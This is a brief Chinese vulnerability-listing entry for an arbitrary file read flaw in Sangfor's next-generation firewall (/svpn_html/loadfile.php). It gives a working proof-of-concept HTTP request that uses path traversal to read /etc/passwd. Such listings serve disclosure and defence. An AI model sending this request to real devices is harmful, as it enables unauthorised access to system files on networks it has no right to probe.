深信服下一代防火墙 /svpn_html/loadfile.php 任意文件读取漏洞

日期: 2023-10-06 | 影响软件: 下一代防火墙 | POC: 已公开

漏洞描述

深信服下一代防火墙某历史版本存在任意文件读取漏洞

PoC代码

GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
Host: 
Accept-Encoding: gzip
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Y-Forwarded-For: [REDACTED]

相关漏洞推荐